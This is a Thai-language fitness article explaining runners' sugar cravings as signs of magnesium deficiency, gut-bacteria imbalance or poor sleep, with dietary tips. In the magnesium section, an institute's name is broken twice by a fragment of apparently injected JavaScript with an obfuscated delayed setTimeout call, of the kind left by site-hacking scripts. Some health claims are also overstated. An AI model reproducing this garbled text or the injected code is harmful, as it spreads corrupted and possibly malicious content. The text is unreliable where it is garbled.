มีอะไรบ้างที่นักวิ่งไม่อยากกิน….โค้ก เป๊ปซี่ คาปูชิโน่หรือจะเป็นชาเขียวสตาร์บัคใส่วิปครีม ของหวาน เหล่านี้ถ้ากินมากและเอาออกน้อย (เบริ์น) จะอ้วนเอาเพราะน้ำตาลจะกลายสภาพเป็นไขมันสะสม ท้องจะมีห่วงยางและคางจะมีเหนียง เมื่อถึงช่วงเวลาฝึกซ้อมเพื่อชดใช้กรรมหรือจะลดละเลิกของหวานเพื่อควบคุมน้ำหนัก นักวิ่งมักจะเจออุปสรรค นั้นคือ มีอาการอยากของหวาน (Sugar Craving) ขึ้นมาทันทีหลังออกกำลังกาย หรือมีอาการเกิดขึ้นมาเป็นระยะมาทั้งเช้าและเย็น แย่สุดๆ คือตกเย็นถึงกลางคืนก็ยังมีอาการค้างคาอยู่ในหัว
Sugar Craving: รู้ไหมอาการอยาก “ของหวาน” เเปลว่าอะไร
อาการอยากของหวาน (Sugar Craving) โดยพื้นฐานแล้วเป็นสัญญาบ่งบอกว่าร่างกายมีการขาดสารอาหารบางอย่าง ไม่ได้หมายถึงอยากน้ำตาลเสมอไป แต่ค่อนข้างยากที่จะระบุได้ 100% ว่าขาดตัวอะไรได้ ซึ่งส่วนมากเราจะแก้ไขโดยการกินของหวานที่มีน้ำตาลเป็นองค์ประกอบหลักแทน
เรามาดูกันว่าอาการอยากน้ำตาล (Sugar Craving) สามารถตีความว่าร่างกายขาดสารอาหารประเภทไหนได้บ้าง…
1. Magnesium Deficiency ร่างกายอยากของหวานเพราะร่างกายขาดสารแมกนีเซียม โดยจากการศึกษาของ Susan Yanovski จากสถาบัน National Institute of Diabetes andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and Digestive andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and Kidney Diseases พบว่า อาการหงุดหงิดฉุนเฉียว ความดันเลือดสูง นอนไม่หลับ เครียดและอยากกินของหวาน โดยเฉพาะประเภทช็อกโกเเลต มักจะเป็นอาการที่ร่างกายขาดสารแมกนีเซียม
ทั้งนี้ช็อกโกเเลตจะอุดมไปด้วยสารแมกนีเซียม แต่ปัญหาคือในช็อกโกเเลตก็มีปริมาณน้ำตาลมากตามเช่นกัน ผลที่จะได้ตามมาหลักสารแมกนีเซียมได้ถูกเดิมเต็มคือ ความเสี่ยงการเป็นโรคอ้วนและเบาหวาน นักวิ่งควรปรับเปลี่ยนไปรับประทาน ช็อกโกเเลตดำแทน (Dark Chocolate) หรือจะเป็นเมล็ดธัญพืช เมล็ดฟักทอง ถั่วและผักสีเขียว
2. IMBALANCED GUT BACTERIA อาการอยากของหวานที่เกิดจากจุลินทรีย์ในลำไส้เสียสมดุล โดยการทำงานของจุนลินทรีย์ดีในลำไส้แย่ลงหรือมีสัดส่วนปริมาณน้อยลง ทำให้ระบบย่อยสลายอาหารทำงานได้ไม่ดี ร่างกายดึงสารอาหารมาไม่ครอบเต็มร้อย และยิ่งนักวิ่งนิยมการรับประทานอาหารที่เป็นของหวาน หรือขนมหวานบ่อยๆ จะทำให้ระบบลำไส้แย่ลงไปด้วย
จากการวิจัยของชีววิทยา ศาสตราจารย์ Jeffrey Gordon แห่ง Washington University รัฐ St. Louis. หากนักวิ่งรับแต่ของหวานและขนมหวานบ่อยๆ พบว่าจุนลินทรีย์เกิดการเลือกย่อยเฉพาะอาหารหวาน และเริ่มปฏิเสธ ไม่ย่อยอาหารที่มีคุณภาพ เพื่อการป้องกัน นักวิ่งควรเน้นการรับประทานอาหารที่มีคุณภาพ เป็นสัดส่วนที่มากกว่าของหวาน และอาหารประเภท โปรไบโอติกเพิ่มเติม อย่าง โยเกริ์ตและนมเปรี้ยวที่มีจุนลินทรีย์ที่เป็นมิตรต่อลำไส้
3. Not Enough Rest อาการอยากของหวานเพราะขาดการพักผ่อนที่ไม่เพียงพอ สาเหตุอาการอยากของหวาน (Sugar carving) อันดับหนึ่งของนักวิ่งมาจาก การนอนหลับพักผ่อนไม่เพียงพอ หลังการฝึกซ้อม อย่างน้อยควรมีเวลาหลับพักผ่อน 6-7 ชั่วโมง และหากซ้อมหนักก็ควรบวกเพิ่มไปอีก 1-2 ชั่วโมงเลย เพราะการนอนหลับจะช่วยให้ร่างกายหลั่งฮอร์โมนในการฟื้นฟู เสริมสร้างและช่วยลดความเครียดลง
การนอนหลับที่ไม่เพียงพอ จะทำให้ระบบเคมีในร่างกายแปรปร่วน และทำให้เกิดอาการและความรู้สึกว่าร่างกายสูญเสียสารอาหารไป ต้องการพลังงานหรือสารอาการเพิ่มเติม และส่งสัญญามาในรูปความอยากน้ำตาล
ถ้าเราสามารถควบคุมการรับประทานอาหารที่มีคุณภาพและการนอนหลับพักผ่อนให้เพียงพอ เชื่อว่าเราจะหยุดอาการอยากน้ำตาลได้เกือบร้อยเปอร์เซ็นต์แน่นอน เวลาหิวของหวานก็อย่าเพิ่งตีความว่าร่างกายต้องการน้ำตาลซะอย่างเดียว ลองนั่งวิเคราะห์พฤติกรรมย้อนหลังและค่อยๆ แก้ไขไปที่ละอย่าง หวานกินได้แต่ค่อยๆ เบาลง อย่ากินจนติดนิสัย
อ้างอิงblog.myfitnesspal.com